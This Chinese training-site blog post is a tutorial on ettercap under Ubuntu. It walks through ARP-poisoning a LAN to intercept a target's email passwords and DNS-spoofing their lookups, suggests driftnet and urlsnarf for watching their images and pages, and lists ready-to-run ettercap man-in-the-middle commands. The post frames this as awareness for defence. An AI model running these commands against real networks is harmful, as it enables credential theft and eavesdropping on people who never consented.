当前位置:首页 > 嵌入式培训 > 嵌入式学习 > 讲师博文 > 基于ubuntu嗅探工具的使用

基于ubuntu嗅探工具的使用 时间:2018-09-26      来源:未知

运行平台:ubuntu

嗅探软件:ettercap

互联网发展速度飞快,给我们带来的便捷,也给我们留下了危险。在很多报道中都有关于用户信息丢失,数据被窃听等新闻,那这些是如何实现的呢,以此文章给大家一些提示,知道如何攻击,才能更好的做好防范。

何为嗅探: 通俗的说就是窃听局域网的数据包,专业一点就是arp攻击。

arp攻击原理:

第一步:安装软件

在ubuntu终端窗口输入如下:

(注意:安装此软件,一定要注意是可以连通外网)

第二步:ettercap软件的使用

1)图形化界面

A)监听邮箱及密码

启动之后如下界面:

选择要监听的网卡

列出当前局域网上所有主机

列出当前正局域网上主机

选定目标主机,然后点add to target 1,将目标主机添加到目标1;选定路由,点add to target 2,将路由添加到目标

然后点mitm --- arp posoning ,勾选sniff remote connections:

点击start,开始监听

如果局域网中主机很多,你在上面可以把除了路由器的其它主机全加到目标1中,将路由器加到目标2中,可能效果非常好哦。

目标机攻击之前的路由器mac:

攻击之后如下:

监控信息如下:

可以配合driftnet 监控用户访问所有图片

也可配合urlsnarf 监控用户访问所有网页

B)ettercap 实现dns 欺骗

修改配置文件:

重新打开ettercap,配置dns模块,再次start

在目标机上运行ping www.baidu.com,将会看到如下效果

2)命令行方式

选项

-I 显示可用网卡

-i 选择网卡

-t 协议选择,tcp/udp/all,默认为all

-p 不进行毒化攻击,用于嗅探本地数据包

-F 载入过滤器文件

-V text 将数据包以文本形式显示在屏幕上

-L filename 把所有的数据包保存下来(所得文件只能用etterlog来显示)

下面列出几个常用的参数组合:

ettercap -Tzq

以命令行方式显示,只嗅探本地数据包,只显示捕捉到的用户名和密码以及其他信息。

ettercap -T -M arp:remote /192.168.1.1/ /192.168.1.2-10/

嗅探网关(192.168.1.1)与部分主机(192.168.1.2-10)之间相互通信的数据包。

ettercap -Tzq //110

只嗅探本机110端口(pop3)的信息

ettercap -Tzq /10.0.0.1/21,22,23

只嗅探本机与10.0.0.1主机在端口21、22、23上的通信

ettercap -i eth0 -Tq -L sniffed_data -F filter.ef -M arp:remote /10.1.1.2/80 //

在eth0网卡上用自己的filter嗅探ip为10.1.1.2主机在80端口上的所有通信,并把所有的数据包保存成文件名为“sniffed_data”的文件

ettercap -i eth0 -Tq -L sniffed_data -F filter.ef -M arp:remote /10.1.1.1/ /10.1.1.2/

单向欺骗路由,只劫持路由发向10.1.1.2的数据包。

此文章只是想告诉大家,网络非常危险,操作需谨慎。

上一篇:基于c语言tftp服务器与客户端实现

下一篇:关于C语言中内存分配

热点文章推荐
华清学员就业榜单
高薪学员经验分享
热点新闻推荐
前台专线:010-82525158 企业培训洽谈专线:010-82525379 院校合作洽谈专线:010-82525379 Copyright © 2004-2022 北京华清远见科技集团有限公司 版权所有 ,京ICP备16055225号-5京公海网安备11010802025203号

回到顶部